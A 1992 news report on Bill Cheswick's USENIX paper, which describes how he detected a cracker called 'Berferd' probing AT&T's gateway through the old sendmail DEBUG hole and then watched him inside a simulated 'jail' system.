Catching Crackers
SAN FRANCISCO, CALIFORNIA, U.S.A., 1992 JAN 30 (NB) -- At the last Usenix conference, Bill Cheswick of AT&T Bell Labs announced to the world that he had a secure Internet gateway, and while he didn't invite people to try to attack it, he knew that it would happen sooner or later. Cheswick described what happened while presenting a paper at the 1992 Winter USENIX conference, a technical conference that took place in parallel with the UniForum trade show in San Francisco last week. In order to find out if people were doing anything to the gateway to AT&T's computer network, Cheswick laid a number of traps and connected electronic alarms to them so that he'd know when somebody was attempting something out of the ordinary. Cheswick's alarms looked for attempts to use old security holes that had become well known to the system cracking community -- particularly the famous DEBUG command on the electronic mail program that was the entry for Robert Morris' famous "Internet Worm" several years ago. In this case, exactly such an attempt was made on Jan 15, 1991, the night of the air attack on Iraq. Cheswick was torn from his TV to look at logs of an attempt to break the mailer and sneak into AT&T's computers. He "wondered idly if Saddam had hired a cracker or two." Cheswick arranged to respond manually to these attempts, rather than having the computer respond. With this, he was able to simulate success for the intruder. These attempts at simulation got more and more involved as the days progressed. Cheswick convinced the cracker, who went by the name of "Berferd" that commands sent to the mail debugger were batched and processed only a few times a day. In spite of an amazing series of dubious assumptions, the scheme worked, and soon Cheswick got to play the computer to the break-in artist. The crackers was using a stolen account at Stanford, which they dialed into using overseas long distance. (Cheswick considered briefly asking other AT&T staff to trace the call if it was going over their network, but reported that the company is actually quite protective of such information -- a policy he agrees with.) The next week, Cheswick attended the Usenix conference in Dallas. From there, using the network terminal room, he was able to simulate the slow execution of the attackers commands from halfway across the country, with the aid of excited onlookers. Eventually he constructed what he calls a "jail" (or "roach motel") -- a dummy system in a special compartment of his interface computer that the cracker could play in while being observed. Many logs of his attempts were kept at Stanford, AT&T and other sites under attack. "Berferd" was eventually traced to the Netherlands, where the hunt was slowed by the lack of laws to deal with computer intrusion there. Reportedly, the attacks eventually stopped when "somebody called his mother and explained the situation." Cheswick has suggested that standard programs be shipped with such alarms in place as a deterrent to system cracking efforts.